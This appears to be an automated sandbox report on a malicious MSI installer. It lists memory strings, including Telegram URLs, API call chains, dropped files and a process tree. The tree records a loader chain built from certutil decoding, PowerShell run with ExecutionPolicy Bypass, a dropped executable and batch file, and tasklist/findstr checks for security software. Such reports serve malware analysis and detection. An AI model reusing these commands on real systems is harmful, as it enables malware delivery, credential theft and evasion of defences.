            Source: Corrections.com, 0000001A.00000003.2334909067.00000000038A1000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2335491745.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2334763783.000000000392F000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3002616459.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2334820485.000000000392F000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2335456362.00000000038C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/
            Source: Corrections.com, 0000001A.00000002.3004390803.00000000038A0000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2335230386.0000000000E1C000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004594101.0000000003966000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3007890735.000000000409A000.00000040.00001000.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0r
            Source: Corrections.com, 0000001A.00000002.3004390803.00000000038A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0r13
            Source: Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0rd0wntgMozilla/5.0
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003966000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3007890735.000000000409A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
            Source: Corrections.com, 0000001A.00000002.3006622611.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004996971.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, K6XT0Z.26.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: Colonial.16.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: chrome.exe, 0000001D.00000003.2532799851.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557159264.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2581109973.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537282781.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567164223.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
            Source: chrome.exe, 0000001D.00000003.2532799851.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557159264.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2581109973.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537282781.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567164223.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
            Source: chrome.exe, 0000001D.00000003.2532799851.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557159264.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2581109973.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537282781.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567164223.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
            Source: Corrections.com, 0000001A.00000002.3006622611.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004996971.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, K6XT0Z.26.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: Colonial.16.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2534673589.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532253880.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533855821.0000600400454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532761049.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2534673589.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533336865.0000600400D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532253880.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533855821.0000600400454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: chrome.exe, 0000001D.00000003.2578370556.000060040304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578206013.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
            Source: chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
            Source: chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
            Source: chrome.exe, 0000001D.00000003.2572689155.0000600402AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2572722383.0000600402AB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2572653266.0000600402AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
            Source: chrome.exe, 0000001D.00000003.2578061639.0000600403074000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577681334.00006004030D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578370556.000060040304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578206013.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
            Source: chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
            Source: chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49756 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.4:49764 version: TLS 1.2
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 16_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00FBF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00FBF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 16_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00FD9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

            System Summary

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\putt.exe
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00F5FFE0 CloseHandle,NtProtectVirtualMemory
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00FB4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00FA1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 16_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00FAF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\625ebd.msi
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI60C0.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI614E.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI619D.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI63A2.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\625ebf.msi
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI64FB.tmp
            Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI60C0.tmp
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F485C04_2_00007FF749F485C0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F6F5C04_2_00007FF749F6F5C0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F535E04_2_00007FF749F535E0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F976004_2_00007FF749F97600
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F5B6184_2_00007FF749F5B618
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F7F7084_2_00007FF749F7F708
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B3E4B519_2_00007FFD9B3E4B51
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_0040737E16_2_0040737E
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_00406EFE16_2_00406EFE
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_004079A216_2_004079A2
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_004049A816_2_004049A8
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F6801726_2_00F68017
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F4E1F026_2_00F4E1F0
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F5E14426_2_00F5E144
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F622A226_2_00F622A2
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F422AD26_2_00F422AD
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F7A26E26_2_00F7A26E
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F5C62426_2_00F5C624
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FCC8A426_2_00FCC8A4
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F7E87F26_2_00F7E87F
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F76ADE26_2_00F76ADE
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FB2A0526_2_00FB2A05
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FA8BFF26_2_00FA8BFF
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F5CD7A26_2_00F5CD7A
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F6CE1026_2_00F6CE10
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F7715926_2_00F77159
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F4924026_2_00F49240
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FD531126_2_00FD5311
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F496E026_2_00F496E0
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F6170426_2_00F61704
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F61A7626_2_00F61A76
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F67B8B26_2_00F67B8B
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F49B6026_2_00F49B60
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F67DBA26_2_00F67DBA
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F61D2026_2_00F61D20
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F61FE726_2_00F61FE7
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: String function: 00F60DA0 appears 46 times
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: String function: 00F5FD52 appears 40 times
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: String function: 004062CF appears 57 times
            Source: Setup.msi Binary or memory string: OriginalFilenameviewer.exeF vs Setup.msi
            Source: Setup.msi Binary or memory string: OriginalFilenameAICustAct.dllF vs Setup.msi
            Source: QQ9RQQ.26.dr Binary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
            Source: classification engine Classification label: mal100.troj.spyw.evad.winMSI@58/88@5/7
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00FB41FA GetLastError,FormatMessageW
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00FA2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00FA1A0B AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 16_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Windows\Installer\MSI64FB.tmp Code function: 4_2_00007FF749F45A80 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle
            Source: C:\Windows\Installer\MSI64FB.tmp Code function: 4_2_00007FF749F46AC0 CoInitializeEx,CoCreateInstance,VariantInit,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,VariantInit,LocalFree,LocalFree,SysAllocString,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
            Source: C:\Windows\Installer\MSI64FB.tmp Code function: 4_2_00007FF749F41B70 LoadResource,LockResource,SizeofResource
            Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\SoftPortable
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSIAE63.tmp
            Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\msiexec.exe File read: C:\Windows\win.ini
            Source: C:\Windows\System32\msiexec.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: KFUSRIECT.26.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Setup.msi"
            Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 50B4D686C01703530B412DCED2DB0D4F C
            Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E4D759A8E406C9ACB7BC72DE0FA3790E
            Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI64FB.tmp "C:\Windows\Installer\MSI64FB.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KingSoft\1.bat"
            Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -decode -f C:\Users\user\AppData\Local\Temp\11808.ps1 C:\Users\user\AppData\Local\Temp\11808.ps1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cscript.exe cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs"
            Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe"
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
